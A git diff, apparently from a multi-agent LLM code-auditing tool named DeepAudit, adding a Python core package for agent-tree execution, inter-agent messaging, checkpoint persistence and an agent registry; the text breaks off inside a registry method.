result["tech_stack"]["frameworks"] = list(set(result["tech_stack"]["frameworks"])) result["tech_stack"]["frameworks"] = list(set(result["tech_stack"]["frameworks"]))
result["tech_stack"]["databases"] = list(set(result["tech_stack"]["databases"]))
result["high_risk_areas"] = list(set(result["high_risk_areas"]))[:20] # 限制数量
# 🔥 汇总 LLM 的思考作为 summary
if thoughts:
# 取最后几个思考作为总结
result["summary"] = "\n".join(thoughts[-3:])
return result return result

View File

@ -334,7 +334,7 @@ class VerificationAgent(BaseAgent):
llm_output, tokens_this_round = await self.stream_llm_call( llm_output, tokens_this_round = await self.stream_llm_call(
self._conversation_history, self._conversation_history,
temperature=0.1, temperature=0.1,
max_tokens=3000, max_tokens=4096, # 🔥 增加到 4096避免截断
) )
except asyncio.CancelledError: except asyncio.CancelledError:
logger.info(f"[{self.name}] LLM call cancelled") logger.info(f"[{self.name}] LLM call cancelled")
@ -415,6 +415,22 @@ class VerificationAgent(BaseAgent):
# 处理结果 # 处理结果
duration_ms = int((time.time() - start_time) * 1000) duration_ms = int((time.time() - start_time) * 1000)
# 🔥 如果被取消,返回取消结果
if self.is_cancelled:
await self.emit_event(
"info",
f"🛑 Verification Agent 已取消: {self._iteration} 轮迭代"
)
return AgentResult(
success=False,
error="任务已取消",
data={"findings": findings_to_verify},
iterations=self._iteration,
tool_calls=self._tool_calls,
tokens_used=self._total_tokens,
duration_ms=duration_ms,
)
# 处理最终结果 # 处理最终结果
verified_findings = [] verified_findings = []
if final_result and "findings" in final_result: if final_result and "findings" in final_result:

View File

@ -0,0 +1,53 @@
"""
DeepAudit Agent 核心模块
包含Agent系统的基础组件
- state: 增强的Agent状态管理
- registry: Agent注册表和动态Agent树管理
- message: Agent间通信机制
- executor: 动态Agent树执行器
- persistence: Agent状态持久化
"""
from .state import AgentState, AgentStatus
from .registry import AgentRegistry, agent_registry
from .message import AgentMessage, MessageType, MessagePriority, MessageBus, message_bus
from .executor import (
DynamicAgentExecutor,
SubAgentExecutor,
ExecutionTask,
ExecutionResult,
ExecutionMode,
)
from .persistence import (
AgentStatePersistence,
CheckpointManager,
agent_persistence,
checkpoint_manager,
)
__all__ = [
# State
"AgentState",
"AgentStatus",
# Registry
"AgentRegistry",
"agent_registry",
# Message
"AgentMessage",
"MessageType",
"MessagePriority",
"MessageBus",
"message_bus",
# Executor
"DynamicAgentExecutor",
"SubAgentExecutor",
"ExecutionTask",
"ExecutionResult",
"ExecutionMode",
# Persistence
"AgentStatePersistence",
"CheckpointManager",
"agent_persistence",
"checkpoint_manager",
]

View File

@ -0,0 +1,491 @@
"""
动态 Agent 树执行器
实现完整的动态 Agent 树执行逻辑
- Agent 实际执行
- 并行 Agent 执行
- 结果汇总
- 执行状态追踪
"""
import asyncio
import logging
import time
from typing import Dict, Any, List, Optional, Callable, Awaitable
from dataclasses import dataclass, field
from enum import Enum
from datetime import datetime, timezone
from .state import AgentState, AgentStatus
from .registry import agent_registry
from .message import message_bus, MessageType
logger = logging.getLogger(__name__)
class ExecutionMode(str, Enum):
"""执行模式"""
SEQUENTIAL = "sequential" # 顺序执行
PARALLEL = "parallel" # 并行执行
ADAPTIVE = "adaptive" # 自适应(根据任务类型决定)
@dataclass
class ExecutionTask:
"""执行任务"""
agent_id: str
agent_type: str
task: str
context: Dict[str, Any] = field(default_factory=dict)
priority: int = 0 # 优先级,数字越大优先级越高
dependencies: List[str] = field(default_factory=list) # 依赖的其他任务 ID
# 执行状态
status: str = "pending" # pending, running, completed, failed
result: Optional[Dict[str, Any]] = None
error: Optional[str] = None
started_at: Optional[datetime] = None
finished_at: Optional[datetime] = None
@dataclass
class ExecutionResult:
"""执行结果"""
success: bool
total_agents: int = 0
completed_agents: int = 0
failed_agents: int = 0
# 汇总的发现
all_findings: List[Dict[str, Any]] = field(default_factory=list)
# 各 Agent 的结果
agent_results: Dict[str, Dict[str, Any]] = field(default_factory=dict)
# 执行统计
total_duration_ms: int = 0
total_tokens: int = 0
total_tool_calls: int = 0
# 错误信息
errors: List[str] = field(default_factory=list)
class DynamicAgentExecutor:
"""
动态 Agent 树执行器
负责
1. 管理 Agent 的创建和执行
2. 处理并行执行和依赖关系
3. 汇总执行结果
4. 处理错误和超时
"""
def __init__(
self,
llm_service,
tools: Dict[str, Any],
event_emitter=None,
max_parallel: int = 5,
default_timeout: int = 600,
):
"""
初始化执行器
Args:
llm_service: LLM 服务
tools: 可用工具
event_emitter: 事件发射器
max_parallel: 最大并行 Agent
default_timeout: 默认超时时间
"""
self.llm_service = llm_service
self.tools = tools
self.event_emitter = event_emitter
self.max_parallel = max_parallel
self.default_timeout = default_timeout
# 执行状态
self._tasks: Dict[str, ExecutionTask] = {}
self._running_tasks: Dict[str, asyncio.Task] = {}
self._semaphore = asyncio.Semaphore(max_parallel)
# 取消标志
self._cancelled = False
def cancel(self):
"""取消所有执行"""
self._cancelled = True
# 取消所有运行中的任务
for task_id, task in self._running_tasks.items():
if not task.done():
task.cancel()
logger.info(f"Cancelled task: {task_id}")
@property
def is_cancelled(self) -> bool:
return self._cancelled
async def execute_agent(
self,
agent_class,
agent_config: Dict[str, Any],
input_data: Dict[str, Any],
parent_id: Optional[str] = None,
knowledge_modules: Optional[List[str]] = None,
) -> Dict[str, Any]:
"""
执行单个 Agent
Args:
agent_class: Agent
agent_config: Agent 配置
input_data: 输入数据
parent_id: Agent ID
knowledge_modules: 知识模块列表
Returns:
Agent 执行结果
"""
if self._cancelled:
return {"success": False, "error": "Execution cancelled"}
async with self._semaphore:
try:
# 创建 Agent 实例
agent = agent_class(
llm_service=self.llm_service,
tools=self.tools,
event_emitter=self.event_emitter,
parent_id=parent_id,
knowledge_modules=knowledge_modules,
**agent_config,
)
# 执行 Agent
start_time = time.time()
result = await asyncio.wait_for(
agent.run(input_data),
timeout=self.default_timeout,
)
duration_ms = int((time.time() - start_time) * 1000)
return {
"success": result.success,
"data": result.data,
"error": result.error,
"agent_id": agent.agent_id,
"iterations": result.iterations,
"tokens_used": result.tokens_used,
"tool_calls": result.tool_calls,
"duration_ms": duration_ms,
"handoff": result.handoff.to_dict() if result.handoff else None,
}
except asyncio.TimeoutError:
logger.error(f"Agent execution timed out")
return {"success": False, "error": "Execution timed out"}
except asyncio.CancelledError:
logger.info(f"Agent execution cancelled")
return {"success": False, "error": "Execution cancelled"}
except Exception as e:
logger.error(f"Agent execution failed: {e}", exc_info=True)
return {"success": False, "error": str(e)}
async def execute_parallel(
self,
tasks: List[ExecutionTask],
agent_factory: Callable[[ExecutionTask], Awaitable[Dict[str, Any]]],
) -> ExecutionResult:
"""
并行执行多个 Agent 任务
Args:
tasks: 任务列表
agent_factory: Agent 工厂函数接收任务返回执行结果
Returns:
汇总的执行结果
"""
if not tasks:
return ExecutionResult(success=True)
start_time = time.time()
# 按优先级排序
sorted_tasks = sorted(tasks, key=lambda t: t.priority, reverse=True)
# 分离有依赖和无依赖的任务
independent_tasks = [t for t in sorted_tasks if not t.dependencies]
dependent_tasks = [t for t in sorted_tasks if t.dependencies]
# 存储任务
for task in sorted_tasks:
self._tasks[task.agent_id] = task
result = ExecutionResult(
success=True,
total_agents=len(tasks),
)
# 先执行无依赖的任务
if independent_tasks:
await self._execute_task_batch(independent_tasks, agent_factory, result)
# 然后执行有依赖的任务
for task in dependent_tasks:
if self._cancelled:
break
# 等待依赖完成
await self._wait_for_dependencies(task)
# 执行任务
await self._execute_single_task(task, agent_factory, result)
# 计算总时长
result.total_duration_ms = int((time.time() - start_time) * 1000)
# 判断整体成功状态
result.success = result.failed_agents == 0
return result
async def _execute_task_batch(
self,
tasks: List[ExecutionTask],
agent_factory: Callable[[ExecutionTask], Awaitable[Dict[str, Any]]],
result: ExecutionResult,
):
"""执行一批任务"""
async_tasks = []
for task in tasks:
if self._cancelled:
break
async_task = asyncio.create_task(
self._execute_single_task(task, agent_factory, result)
)
self._running_tasks[task.agent_id] = async_task
async_tasks.append(async_task)
# 等待所有任务完成
if async_tasks:
await asyncio.gather(*async_tasks, return_exceptions=True)
async def _execute_single_task(
self,
task: ExecutionTask,
agent_factory: Callable[[ExecutionTask], Awaitable[Dict[str, Any]]],
result: ExecutionResult,
):
"""执行单个任务"""
task.status = "running"
task.started_at = datetime.now(timezone.utc)
try:
# 调用工厂函数执行 Agent
agent_result = await agent_factory(task)
task.finished_at = datetime.now(timezone.utc)
task.result = agent_result
if agent_result.get("success"):
task.status = "completed"
result.completed_agents += 1
# 收集发现
findings = agent_result.get("data", {}).get("findings", [])
result.all_findings.extend(findings)
# 统计
result.total_tokens += agent_result.get("tokens_used", 0)
result.total_tool_calls += agent_result.get("tool_calls", 0)
else:
task.status = "failed"
task.error = agent_result.get("error")
result.failed_agents += 1
result.errors.append(f"{task.agent_id}: {task.error}")
# 保存结果
result.agent_results[task.agent_id] = agent_result
except Exception as e:
task.status = "failed"
task.error = str(e)
task.finished_at = datetime.now(timezone.utc)
result.failed_agents += 1
result.errors.append(f"{task.agent_id}: {str(e)}")
logger.error(f"Task {task.agent_id} failed: {e}", exc_info=True)
finally:
# 清理运行中的任务
self._running_tasks.pop(task.agent_id, None)
async def _wait_for_dependencies(self, task: ExecutionTask):
"""等待任务的依赖完成"""
for dep_id in task.dependencies:
dep_task = self._tasks.get(dep_id)
if not dep_task:
continue
# 等待依赖任务完成
while dep_task.status in ["pending", "running"]:
if self._cancelled:
return
await asyncio.sleep(0.1)
def get_execution_summary(self) -> Dict[str, Any]:
"""获取执行摘要"""
return {
"total_tasks": len(self._tasks),
"completed": sum(1 for t in self._tasks.values() if t.status == "completed"),
"failed": sum(1 for t in self._tasks.values() if t.status == "failed"),
"pending": sum(1 for t in self._tasks.values() if t.status == "pending"),
"running": sum(1 for t in self._tasks.values() if t.status == "running"),
"tasks": {
tid: {
"status": t.status,
"agent_type": t.agent_type,
"error": t.error,
}
for tid, t in self._tasks.items()
},
}
class SubAgentExecutor:
"""
Agent 执行器
专门用于从父 Agent 创建和执行子 Agent
"""
def __init__(
self,
parent_agent,
llm_service,
tools: Dict[str, Any],
event_emitter=None,
):
self.parent_agent = parent_agent
self.llm_service = llm_service
self.tools = tools
self.event_emitter = event_emitter
self._child_agents: Dict[str, Any] = {}
self._executor = DynamicAgentExecutor(
llm_service=llm_service,
tools=tools,
event_emitter=event_emitter,
)
async def create_and_run_sub_agent(
self,
agent_type: str,
task: str,
context: Dict[str, Any] = None,
knowledge_modules: List[str] = None,
) -> Dict[str, Any]:
"""
创建并运行子 Agent
Args:
agent_type: Agent 类型 (analysis, verification, specialist)
task: 任务描述
context: 任务上下文
knowledge_modules: 知识模块
Returns:
Agent 执行结果
"""
from ..agents import AnalysisAgent, VerificationAgent
# 根据类型选择 Agent 类
agent_class_map = {
"analysis": AnalysisAgent,
"verification": VerificationAgent,
}
agent_class = agent_class_map.get(agent_type)
if not agent_class:
return {"success": False, "error": f"Unknown agent type: {agent_type}"}
# 准备输入数据
input_data = {
"task": task,
"task_context": context or {},
"project_info": context.get("project_info", {}) if context else {},
"config": context.get("config", {}) if context else {},
}
# 如果父 Agent 有 handoff传递给子 Agent
if hasattr(self.parent_agent, "_incoming_handoff") and self.parent_agent._incoming_handoff:
input_data["parent_handoff"] = self.parent_agent._incoming_handoff.to_dict()
# 执行子 Agent
result = await self._executor.execute_agent(
agent_class=agent_class,
agent_config={},
input_data=input_data,
parent_id=self.parent_agent.agent_id,
knowledge_modules=knowledge_modules,
)
# 记录子 Agent
if result.get("agent_id"):
self._child_agents[result["agent_id"]] = result
return result
async def run_parallel_sub_agents(
self,
sub_agent_configs: List[Dict[str, Any]],
) -> ExecutionResult:
"""
并行运行多个子 Agent
Args:
sub_agent_configs: Agent 配置列表
[{"agent_type": "analysis", "task": "...", "context": {...}, "knowledge_modules": [...]}]
Returns:
汇总的执行结果
"""
tasks = []
for i, config in enumerate(sub_agent_configs):
task = ExecutionTask(
agent_id=f"sub_{self.parent_agent.agent_id}_{i}",
agent_type=config.get("agent_type", "analysis"),
task=config.get("task", ""),
context=config.get("context", {}),
priority=config.get("priority", 0),
dependencies=config.get("dependencies", []),
)
tasks.append(task)
async def agent_factory(task: ExecutionTask) -> Dict[str, Any]:
return await self.create_and_run_sub_agent(
agent_type=task.agent_type,
task=task.task,
context=task.context,
knowledge_modules=task.context.get("knowledge_modules"),
)
return await self._executor.execute_parallel(tasks, agent_factory)
def get_child_results(self) -> Dict[str, Dict[str, Any]]:
"""获取所有子 Agent 的结果"""
return self._child_agents.copy()
def get_all_findings(self) -> List[Dict[str, Any]]:
"""获取所有子 Agent 发现的漏洞"""
findings = []
for result in self._child_agents.values():
if result.get("success") and result.get("data"):
findings.extend(result["data"].get("findings", []))
return findings

View File

@ -0,0 +1,290 @@
"""
Agent 间通信机制
提供
- 消息类型定义
- 消息队列管理
- Agent间消息传递
"""
import logging
import uuid
from datetime import datetime, timezone
from enum import Enum
from typing import Any, Dict, List, Optional
from dataclasses import dataclass, field
logger = logging.getLogger(__name__)
class MessageType(str, Enum):
"""消息类型"""
QUERY = "query" # 查询消息(请求信息)
INSTRUCTION = "instruction" # 指令消息(要求执行操作)
INFORMATION = "information" # 信息消息(分享发现或状态)
RESULT = "result" # 结果消息(任务完成报告)
ERROR = "error" # 错误消息
class MessagePriority(str, Enum):
"""消息优先级"""
LOW = "low"
NORMAL = "normal"
HIGH = "high"
URGENT = "urgent"
@dataclass
class AgentMessage:
"""
Agent 消息
用于Agent间通信的消息结构
"""
id: str = field(default_factory=lambda: f"msg_{uuid.uuid4().hex[:8]}")
from_agent: str = ""
to_agent: str = ""
content: str = ""
message_type: MessageType = MessageType.INFORMATION
priority: MessagePriority = MessagePriority.NORMAL
timestamp: str = field(default_factory=lambda: datetime.now(timezone.utc).isoformat())
# 状态
delivered: bool = False
read: bool = False
# 附加数据
metadata: Dict[str, Any] = field(default_factory=dict)
def to_dict(self) -> Dict[str, Any]:
"""转换为字典"""
return {
"id": self.id,
"from": self.from_agent,
"to": self.to_agent,
"content": self.content,
"message_type": self.message_type.value if isinstance(self.message_type, MessageType) else self.message_type,
"priority": self.priority.value if isinstance(self.priority, MessagePriority) else self.priority,
"timestamp": self.timestamp,
"delivered": self.delivered,
"read": self.read,
"metadata": self.metadata,
}
@classmethod
def from_dict(cls, data: Dict[str, Any]) -> "AgentMessage":
"""从字典创建"""
return cls(
id=data.get("id", f"msg_{uuid.uuid4().hex[:8]}"),
from_agent=data.get("from", ""),
to_agent=data.get("to", ""),
content=data.get("content", ""),
message_type=MessageType(data.get("message_type", "information")),
priority=MessagePriority(data.get("priority", "normal")),
timestamp=data.get("timestamp", datetime.now(timezone.utc).isoformat()),
delivered=data.get("delivered", False),
read=data.get("read", False),
metadata=data.get("metadata", {}),
)
def to_xml(self) -> str:
"""转换为XML格式用于LLM理解"""
return f"""<inter_agent_message>
<sender>
<agent_id>{self.from_agent}</agent_id>
</sender>
<message_metadata>
<type>{self.message_type.value if isinstance(self.message_type, MessageType) else self.message_type}</type>
<priority>{self.priority.value if isinstance(self.priority, MessagePriority) else self.priority}</priority>
<timestamp>{self.timestamp}</timestamp>
</message_metadata>
<content>
{self.content}
</content>
</inter_agent_message>"""
class MessageBus:
"""
消息总线
管理Agent间的消息传递
"""
def __init__(self):
self._queues: Dict[str, List[AgentMessage]] = {}
self._message_history: List[AgentMessage] = []
def create_queue(self, agent_id: str) -> None:
"""为Agent创建消息队列"""
if agent_id not in self._queues:
self._queues[agent_id] = []
logger.debug(f"Created message queue for agent: {agent_id}")
def delete_queue(self, agent_id: str) -> None:
"""删除Agent的消息队列"""
if agent_id in self._queues:
del self._queues[agent_id]
logger.debug(f"Deleted message queue for agent: {agent_id}")
def send_message(
self,
from_agent: str,
to_agent: str,
content: str,
message_type: MessageType = MessageType.INFORMATION,
priority: MessagePriority = MessagePriority.NORMAL,
metadata: Optional[Dict[str, Any]] = None,
) -> AgentMessage:
"""
发送消息
Args:
from_agent: 发送者Agent ID
to_agent: 接收者Agent ID
content: 消息内容
message_type: 消息类型
priority: 优先级
metadata: 附加数据
Returns:
发送的消息
"""
message = AgentMessage(
from_agent=from_agent,
to_agent=to_agent,
content=content,
message_type=message_type,
priority=priority,
metadata=metadata or {},
)
# 确保目标队列存在
if to_agent not in self._queues:
self.create_queue(to_agent)
# 添加到队列
self._queues[to_agent].append(message)
message.delivered = True
# 记录历史
self._message_history.append(message)
logger.debug(f"Message sent from {from_agent} to {to_agent}: {content[:50]}...")
return message
def get_messages(
self,
agent_id: str,
unread_only: bool = True,
mark_as_read: bool = True,
) -> List[AgentMessage]:
"""
获取Agent的消息
Args:
agent_id: Agent ID
unread_only: 是否只获取未读消息
mark_as_read: 是否标记为已读
Returns:
消息列表
"""
if agent_id not in self._queues:
return []
messages = self._queues[agent_id]
if unread_only:
messages = [m for m in messages if not m.read]
if mark_as_read:
for m in messages:
m.read = True
return messages
def has_unread_messages(self, agent_id: str) -> bool:
"""检查是否有未读消息"""
if agent_id not in self._queues:
return False
return any(not m.read for m in self._queues[agent_id])
def get_unread_count(self, agent_id: str) -> int:
"""获取未读消息数量"""
if agent_id not in self._queues:
return 0
return sum(1 for m in self._queues[agent_id] if not m.read)
def send_user_message(
self,
to_agent: str,
content: str,
priority: MessagePriority = MessagePriority.HIGH,
) -> AgentMessage:
"""发送用户消息到Agent"""
return self.send_message(
from_agent="user",
to_agent=to_agent,
content=content,
message_type=MessageType.INSTRUCTION,
priority=priority,
)
def send_completion_report(
self,
from_agent: str,
to_agent: str,
summary: str,
findings: List[Dict[str, Any]],
success: bool = True,
) -> AgentMessage:
"""发送任务完成报告"""
content = f"""<agent_completion_report>
<status>{"SUCCESS" if success else "FAILED"}</status>
<summary>{summary}</summary>
<findings_count>{len(findings)}</findings_count>
</agent_completion_report>"""
return self.send_message(
from_agent=from_agent,
to_agent=to_agent,
content=content,
message_type=MessageType.RESULT,
priority=MessagePriority.HIGH,
metadata={
"summary": summary,
"findings": findings,
"success": success,
},
)
def clear_queue(self, agent_id: str) -> None:
"""清空Agent的消息队列"""
if agent_id in self._queues:
self._queues[agent_id] = []
def clear_all(self) -> None:
"""清空所有消息"""
self._queues.clear()
self._message_history.clear()
def get_message_history(
self,
agent_id: Optional[str] = None,
limit: int = 100,
) -> List[AgentMessage]:
"""获取消息历史"""
history = self._message_history
if agent_id:
history = [
m for m in history
if m.from_agent == agent_id or m.to_agent == agent_id
]
return history[-limit:]
# 全局消息总线实例
message_bus = MessageBus()

View File

@ -0,0 +1,413 @@
"""
Agent 状态持久化模块
提供 Agent 状态的持久化和恢复功能
- Agent 状态序列化和反序列化
- 检查点保存和恢复
- 消息历史持久化
- 执行记录持久化
"""
import json
import logging
import os
from datetime import datetime, timezone
from typing import Dict, Any, List, Optional
from pathlib import Path
from .state import AgentState, AgentStatus
from .registry import agent_registry
logger = logging.getLogger(__name__)
class AgentStatePersistence:
"""
Agent 状态持久化管理器
支持
- 文件系统持久化
- 数据库持久化可选
- 检查点机制
"""
def __init__(
self,
persist_dir: str = "./agent_checkpoints",
use_database: bool = False,
db_session_factory=None,
):
"""
初始化持久化管理器
Args:
persist_dir: 持久化目录
use_database: 是否使用数据库持久化
db_session_factory: 数据库会话工厂
"""
self.persist_dir = Path(persist_dir)
self.use_database = use_database
self.db_session_factory = db_session_factory
# 确保目录存在
self.persist_dir.mkdir(parents=True, exist_ok=True)
# ============ 文件系统持久化 ============
def save_state(self, state: AgentState, checkpoint_name: Optional[str] = None) -> str:
"""
保存 Agent 状态到文件
Args:
state: Agent 状态
checkpoint_name: 检查点名称可选
Returns:
保存的文件路径
"""
# 生成文件名
if checkpoint_name:
filename = f"{state.agent_id}_{checkpoint_name}.json"
else:
timestamp = datetime.now(timezone.utc).strftime("%Y%m%d_%H%M%S")
filename = f"{state.agent_id}_{timestamp}.json"
filepath = self.persist_dir / filename
# 序列化状态
state_dict = self._serialize_state(state)
# 保存到文件
with open(filepath, "w", encoding="utf-8") as f:
json.dump(state_dict, f, ensure_ascii=False, indent=2)
logger.info(f"Saved agent state to {filepath}")
return str(filepath)
def load_state(self, filepath: str) -> Optional[AgentState]:
"""
从文件加载 Agent 状态
Args:
filepath: 文件路径
Returns:
Agent 状态如果加载失败返回 None
"""
try:
with open(filepath, "r", encoding="utf-8") as f:
state_dict = json.load(f)
state = self._deserialize_state(state_dict)
logger.info(f"Loaded agent state from {filepath}")
return state
except Exception as e:
logger.error(f"Failed to load agent state from {filepath}: {e}")
return None
def load_latest_checkpoint(self, agent_id: str) -> Optional[AgentState]:
"""
加载指定 Agent 的最新检查点
Args:
agent_id: Agent ID
Returns:
Agent 状态
"""
# 查找所有匹配的检查点文件
pattern = f"{agent_id}_*.json"
checkpoints = list(self.persist_dir.glob(pattern))
if not checkpoints:
logger.warning(f"No checkpoints found for agent {agent_id}")
return None
# 按修改时间排序,取最新的
latest = max(checkpoints, key=lambda p: p.stat().st_mtime)
return self.load_state(str(latest))
def list_checkpoints(self, agent_id: Optional[str] = None) -> List[Dict[str, Any]]:
"""
列出检查点
Args:
agent_id: Agent ID可选不指定则列出所有
Returns:
检查点信息列表
"""
if agent_id:
pattern = f"{agent_id}_*.json"
else:
pattern = "*.json"
checkpoints = []
for filepath in self.persist_dir.glob(pattern):
stat = filepath.stat()
checkpoints.append({
"filepath": str(filepath),
"filename": filepath.name,
"size_bytes": stat.st_size,
"created_at": datetime.fromtimestamp(stat.st_ctime, tz=timezone.utc).isoformat(),
"modified_at": datetime.fromtimestamp(stat.st_mtime, tz=timezone.utc).isoformat(),
})
# 按修改时间排序
checkpoints.sort(key=lambda x: x["modified_at"], reverse=True)
return checkpoints
def delete_checkpoint(self, filepath: str) -> bool:
"""
删除检查点
Args:
filepath: 文件路径
Returns:
是否删除成功
"""
try:
os.remove(filepath)
logger.info(f"Deleted checkpoint: {filepath}")
return True
except Exception as e:
logger.error(f"Failed to delete checkpoint {filepath}: {e}")
return False
def cleanup_old_checkpoints(
self,
agent_id: str,
keep_count: int = 5,
) -> int:
"""
清理旧的检查点只保留最新的几个
Args:
agent_id: Agent ID
keep_count: 保留的检查点数量
Returns:
删除的检查点数量
"""
checkpoints = self.list_checkpoints(agent_id)
if len(checkpoints) <= keep_count:
return 0
# 删除旧的检查点
to_delete = checkpoints[keep_count:]
deleted = 0
for cp in to_delete:
if self.delete_checkpoint(cp["filepath"]):
deleted += 1
return deleted
# ============ 序列化/反序列化 ============
def _serialize_state(self, state: AgentState) -> Dict[str, Any]:
"""序列化 Agent 状态"""
return {
"version": "1.0",
"serialized_at": datetime.now(timezone.utc).isoformat(),
"state": state.model_dump(),
}
def _deserialize_state(self, data: Dict[str, Any]) -> AgentState:
"""反序列化 Agent 状态"""
version = data.get("version", "1.0")
state_data = data.get("state", data)
# 处理版本兼容性
if version == "1.0":
return AgentState(**state_data)
else:
logger.warning(f"Unknown state version: {version}, attempting to load anyway")
return AgentState(**state_data)
# ============ 数据库持久化 ============
async def save_state_to_db(
self,
state: AgentState,
task_id: str,
) -> bool:
"""
保存 Agent 状态到数据库
Args:
state: Agent 状态
task_id: 关联的任务 ID
Returns:
是否保存成功
"""
if not self.use_database or not self.db_session_factory:
logger.warning("Database persistence not configured")
return False
try:
async with self.db_session_factory() as session:
from app.models.agent_task import AgentCheckpoint
checkpoint = AgentCheckpoint(
task_id=task_id,
agent_id=state.agent_id,
agent_name=state.agent_name,
agent_type=state.agent_type,
state_data=state.model_dump_json(),
iteration=state.iteration,
status=state.status,
created_at=datetime.now(timezone.utc),
)
session.add(checkpoint)
await session.commit()
logger.info(f"Saved agent state to database: {state.agent_id}")
return True
except Exception as e:
logger.error(f"Failed to save agent state to database: {e}")
return False
async def load_state_from_db(
self,
task_id: str,
agent_id: Optional[str] = None,
) -> Optional[AgentState]:
"""
从数据库加载 Agent 状态
Args:
task_id: 任务 ID
agent_id: Agent ID可选
Returns:
Agent 状态
"""
if not self.use_database or not self.db_session_factory:
logger.warning("Database persistence not configured")
return None
try:
async with self.db_session_factory() as session:
from sqlalchemy import select
from app.models.agent_task import AgentCheckpoint
query = select(AgentCheckpoint).where(
AgentCheckpoint.task_id == task_id
)
if agent_id:
query = query.where(AgentCheckpoint.agent_id == agent_id)
query = query.order_by(AgentCheckpoint.created_at.desc()).limit(1)
result = await session.execute(query)
checkpoint = result.scalar_one_or_none()
if checkpoint:
state_data = json.loads(checkpoint.state_data)
return AgentState(**state_data)
return None
except Exception as e:
logger.error(f"Failed to load agent state from database: {e}")
return None
class CheckpointManager:
"""
检查点管理器
提供自动检查点功能
- 定期保存检查点
- 错误恢复
- 状态回滚
"""
def __init__(
self,
persistence: AgentStatePersistence,
auto_checkpoint_interval: int = 5, # 每 N 次迭代自动保存
):
self.persistence = persistence
self.auto_checkpoint_interval = auto_checkpoint_interval
self._last_checkpoint_iteration: Dict[str, int] = {}
def should_checkpoint(self, state: AgentState) -> bool:
"""
判断是否应该创建检查点
Args:
state: Agent 状态
Returns:
是否应该创建检查点
"""
last_iteration = self._last_checkpoint_iteration.get(state.agent_id, 0)
return state.iteration - last_iteration >= self.auto_checkpoint_interval
def create_checkpoint(
self,
state: AgentState,
checkpoint_name: Optional[str] = None,
) -> str:
"""
创建检查点
Args:
state: Agent 状态
checkpoint_name: 检查点名称
Returns:
检查点文件路径
"""
filepath = self.persistence.save_state(state, checkpoint_name)
self._last_checkpoint_iteration[state.agent_id] = state.iteration
return filepath
def auto_checkpoint(self, state: AgentState) -> Optional[str]:
"""
自动检查点如果需要
Args:
state: Agent 状态
Returns:
检查点文件路径如果没有创建则返回 None
"""
if self.should_checkpoint(state):
return self.create_checkpoint(state)
return None
def restore_from_checkpoint(
self,
agent_id: str,
checkpoint_filepath: Optional[str] = None,
) -> Optional[AgentState]:
"""
从检查点恢复
Args:
agent_id: Agent ID
checkpoint_filepath: 检查点文件路径可选不指定则使用最新的
Returns:
恢复的 Agent 状态
"""
if checkpoint_filepath:
return self.persistence.load_state(checkpoint_filepath)
else:
return self.persistence.load_latest_checkpoint(agent_id)
# 全局持久化管理器
agent_persistence = AgentStatePersistence()
checkpoint_manager = CheckpointManager(agent_persistence)

View File

@ -0,0 +1,309 @@
"""
Agent 注册表和动态Agent树管理
提供
- Agent实例注册和管理
- 动态Agent树结构
- Agent状态追踪
- 子Agent创建和销毁
"""
import logging
import threading
from datetime import datetime, timezone
from typing import Any, Dict, List, Optional, TYPE_CHECKING
if TYPE_CHECKING:
from .state import AgentState
logger = logging.getLogger(__name__)
class AgentRegistry:
"""
Agent 注册表
管理所有Agent实例维护动态Agent树结构
"""
def __init__(self):
self._lock = threading.RLock()
# Agent图结构
self._agent_graph: Dict[str, Any] = {
"nodes": {}, # agent_id -> node_info
"edges": [], # {from, to, type}
}
# Agent实例和状态
self._agent_instances: Dict[str, Any] = {} # agent_id -> agent_instance
self._agent_states: Dict[str, "AgentState"] = {} # agent_id -> state
# 消息队列
self._agent_messages: Dict[str, List[Dict[str, Any]]] = {} # agent_id -> messages
# 根Agent
self._root_agent_id: Optional[str] = None
# 运行中的Agent线程
self._running_agents: Dict[str, threading.Thread] = {}
# ============ Agent 注册 ============
def register_agent(
self,
agent_id: str,
agent_name: str,
agent_type: str,
task: str,
parent_id: Optional[str] = None,
agent_instance: Any = None,
state: Optional["AgentState"] = None,
knowledge_modules: Optional[List[str]] = None,
) -> Dict[str, Any]:
"""
注册Agent到注册表
Args:
agent_id: Agent唯一标识
agent_name: Agent名称
agent_type: Agent类型
task: 任务描述
parent_id: 父Agent ID
agent_instance: Agent实例
state: Agent状态
knowledge_modules: 加载的知识模块
Returns:
注册的节点信息
"""
logger.info(f"[AgentRegistry] register_agent 被调用: {agent_name} (id={agent_id}, parent={parent_id})")
logger.info(f"[AgentRegistry] 当前节点数: {len(self._agent_graph['nodes'])}, 节点列表: {list(self._agent_graph['nodes'].keys())}")
with self._lock:
node = {
"id": agent_id,
"name": agent_name,
"type": agent_type,
"task": task,
"status": "running",
"parent_id": parent_id,
"created_at": datetime.now(timezone.utc).isoformat(),
"finished_at": None,
"result": None,
"knowledge_modules": knowledge_modules or [],
"children": [],
}
self._agent_graph["nodes"][agent_id] = node
if agent_instance:
self._agent_instances[agent_id] = agent_instance
if state:
self._agent_states[agent_id] = state
# 初始化消息队列
if agent_id not in self._agent_messages:
self._agent_messages[agent_id] = []
# 添加边(父子关系)
if parent_id:
self._agent_graph["edges"].append({
"from": parent_id,
"to": agent_id,
"type": "delegation",
"created_at": datetime.now(timezone.utc).isoformat(),
})
# 更新父节点的children列表
if parent_id in self._agent_graph["nodes"]:
self._agent_graph["nodes"][parent_id]["children"].append(agent_id)
# 设置根Agent
if parent_id is None and self._root_agent_id is None:
self._root_agent_id = agent_id
logger.info(f"[AgentRegistry] 注册完成: {agent_name} ({agent_id}), parent: {parent_id}")
logger.info(f"[AgentRegistry] 注册后节点数: {len(self._agent_graph['nodes'])}, 节点列表: {list(self._agent_graph['nodes'].keys())}")
return node
def unregister_agent(self, agent_id: str) -> None:
"""注销Agent"""
with self._lock:
if agent_id in self._agent_graph["nodes"]:
del self._agent_graph["nodes"][agent_id]
self._agent_instances.pop(agent_id, None)
self._agent_states.pop(agent_id, None)
self._agent_messages.pop(agent_id, None)
self._running_agents.pop(agent_id, None)
# 移除相关边
self._agent_graph["edges"] = [
e for e in self._agent_graph["edges"]
if e["from"] != agent_id and e["to"] != agent_id
]
logger.info(f"Unregistered agent: {agent_id}")
# ============ Agent 状态更新 ============
def update_agent_status(
self,
agent_id: str,
status: str,
result: Optional[Dict[str, Any]] = None,
) -> None:
"""更新Agent状态"""
with self._lock:
if agent_id in self._agent_graph["nodes"]:
node = self._agent_graph["nodes"][agent_id]
node["status"] = status
if status in ["completed", "failed", "stopped"]:
node["finished_at"] = datetime.now(timezone.utc).isoformat()
if result:
